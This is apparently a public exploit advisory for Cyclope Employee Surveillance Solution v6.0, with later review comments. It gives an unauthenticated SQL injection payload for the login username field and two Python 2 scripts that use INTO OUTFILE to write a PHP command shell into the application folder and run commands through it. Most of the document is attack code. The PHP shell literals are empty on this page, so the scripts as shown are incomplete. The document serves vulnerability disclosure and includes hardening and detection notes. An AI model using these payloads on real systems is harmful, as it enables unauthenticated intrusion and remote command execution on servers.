# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html

# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most importantly, the username parameter in the application's login form.
#
# PoC 1:
# MySql sleep for 5 seconds.
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# username: x' or sleep(5) and '1'='1
# password: whatever

# As stated, nothing is checked before passing "username" to MySql.
# This results in MySql sleeping for 5 seconds, and an unsuccessful
# attempt.

# PoC 2:
# Remote Code Execution
# No Authentication Required.
# Page: /index.php
# Form: login
# Vulnerable Parameter: username
# Creates a small php shell in the application's root folder.
# It also has the added bonus of writing the administrator username and password

# Side note:
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.

# NOTE(review): root cause and hardening, as far as this page shows them.
#   - The login form's "username" value reaches MySQL unescaped, so the fix is a
#     parameterized query (prepared statement) in the login handler.
#   - PoC 2 only works if the application's MySQL account holds the FILE privilege
#     and the database service can write into the web folder. Revoking FILE,
#     restricting secure_file_priv, and making the web folder read-only for the
#     database service each break the file-write step.
#   - Detection: login POSTs to port 7879 whose "username" contains "into outfile"
#     or "sleep(", an unexpected cmd.php in the application folder, and requests
#     to /Ni4xLjA=/cmd.php (with or without an "exe" query parameter).
# NOTE(review): both listings below are Python 2 only (print statements, urllib2,
# cookielib, str.encode('hex')). The two dashed lines are page separators, not code.

----Python Script Simple Backdoor----
#!/usr/bin/python

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

# Expects exactly two arguments. The usage text appears to have lost its argument
# placeholders on this page; the example line shows a host followed by a command.
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py "
    print "[*] Ex. : poc.py 127.0.0.1 ipconfig"
    exit(0)

rhost = sys.argv[1]  # host running the application (reached on port 7879 below)
rcmd = sys.argv[2]   # command string later passed in the "exe" query parameter

# NOTE(review): the payload body is empty on this page. The advisory text describes a
# small PHP shell, so the literal was presumably lost in extraction -- confirm
# against the original advisory. It is left empty here.
backdoor = ""

# Value sent as "username": it closes the quoted string in the login query and adds a
# SELECT ... INTO OUTFILE subquery. The hex-encoded "backdoor" is given as the line
# terminator, which is how its bytes end up in the written file.
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

# Remaining login form fields; the password value is arbitrary.
act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})

print "[*] Sending evil payload"
# Unauthenticated POST of the login form; no credentials or prior session are used.
resp = opener.open("http://%s:7879/" % rhost, post_params)

print "[*] Triggering backdoor"
# Requests the file the injected query was meant to write; the response is not read.
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
page = urllib.urlopen(cmd)

print "[*] Executing command: %s\n" % rcmd
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)

try:
    page = urllib.urlopen(shell)
    cmd = page.read()
    print cmd
except:
    # Bare except: every failure (network error, HTTP error, anything else) is
    # reported with the same message and the cause is discarded.
    print "[-] Oups! Somthing happened"

---Python Getting Shell---
#!/usr/bin/python

import urllib, cookielib
import urllib2
import sys

print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

# Expects exactly one argument (the host); the usage text shows no placeholder here either.
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py "
    exit(0)

rhost = sys.argv[1]  # host running the application (reached on port 7879 below)

# NOTE(review): empty on this page as well (an empty triple-quoted string); presumably
# stripped in extraction -- confirm against the original advisory. Left empty here.
backdoor = ''''''

# Same injection string and file-write step as the first listing.
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')

act = 'auth-login'
pag = 'login'
password = 'hole'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})

print "[*] Sending evil payload"

try:
    # Unauthenticated login POST carrying the injected "username" value.
    resp = opener.open("http://%s:7879/" % rhost, post_params)
    print "[*] Triggering Shell"
    # Single request for the written file; the body is read into "cmd" but never printed.
    shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost
    page = urllib.urlopen(shell)
    cmd = page.read()
except:
    # Bare except: all errors from either request collapse into one message.
    print "[-] Oups! Somthing happened"